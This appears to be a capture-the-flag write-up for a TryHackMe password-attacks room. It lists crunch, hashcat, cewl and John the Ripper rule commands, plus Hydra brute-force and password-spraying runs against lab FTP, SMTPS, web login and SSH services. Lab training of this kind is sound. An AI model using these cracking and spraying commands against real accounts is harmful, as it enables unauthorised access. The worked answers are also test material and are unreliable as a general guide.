
#### Task 4

What is the crunch command to generate a list containing THM@% and output to a file named tryhackme.txt?

crunch 5 5 -t "THM^^" -o tryhackme.txt



#### Task 5

Considering the following hash: 8d6e34f987851aa599257d3831a1af040886842f. What is the hash type?

hashid 8d6e34f987851aa599257d3831a1af040886842f

Perform a dictionary attack against the following hash: 8d6e34f987851aa599257d3831a1af040886842f. What is the cracked value? Use rockyou.txt wordlist.

hashcat -a 0 -m 100 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt  --show


Perform a brute-force attack against the following MD5 hash: e48e13207341b6bffb7fb1622282247b. What is the cracked value? Note the password is a 4 digit number: [0-9][0-9][0-9][0-9]

hashcat -a 3 -m 0 e48e13207341b6bffb7fb1622282247b ?d?d?d?d



#### Task 6

What syntax would you use to create a rule to produce the following: "S[Word]NN  where N is Number and S is a symbol of !@? 

Az"[0-9][0-9]" ^[!@]

#### Task 8

Can you guess the FTP credentials without brute-forcing? What is the flag?

cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/
hydra -l ftp -P clinic.lst ftp://10.201.5.68

After, you can connect to FTP and get the flag.


In this question, you need to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: pittman@clinic.thmredteam.com against 10.201.5.68:465 (SMTPS).

What is the password? Note that the password format is as follows: [symbol][dictionary word][0-9][0-9].

sudo vi /etc/john/john.conf 
[List.Rules:THM-Password-Attacks] 
Az"[0-9][0-9]" ^[!@#$]

john --wordlist=clinic.lst --rules=THM-Password-Attacks --stdout > pass.lst
hydra -l pittman@clinic.thmredteam.com -P pass.lst smtps://10.201.101.232:465 -v

Perform a brute-forcing attack against the phillips account for the login page at http://10.201.101.232/login-get using hydra? What is the flag?
john --wordlist=clinic.lst --rules=best64 --stdout >> pass-rules.txt
hydra -l phillips -P pass-rules.txt  10.201.124.194 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f



Perform a rule-based password attack to gain access to the burgess account. Find the flag at the following website: http://10.201.124.194/login-post/. What is the flag?

Note: use the clinic.lst dictionary in generating and expanding the wordlist!

john --wordlist=clinic.lst --rules=Single-Extra --stdout > pass2.lst
hydra -l burgess -P pass2.lst 10.201.124.194 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

#### Task 9

Perform a password spraying attack to get access to the SSH://10.201.124.194 server to read /etc/flag. What is the flag?

cat usernames-list.txt 
admin
phillips
burgess
pittman
guess

cat seasons.txt    
Spring
Summer 
Fall
Winter

/etc/john/john.conf
[List.Rules:THM-Attacks] 
Az"[2][0][2][0-9]" $[!@]



john --wordlist=seasons.txt --rules=THM-Attacks --stdout >> pass-extend.txt



hydra -L usernames-list.txt -P pass-extend.txt ssh://10.201.124.194
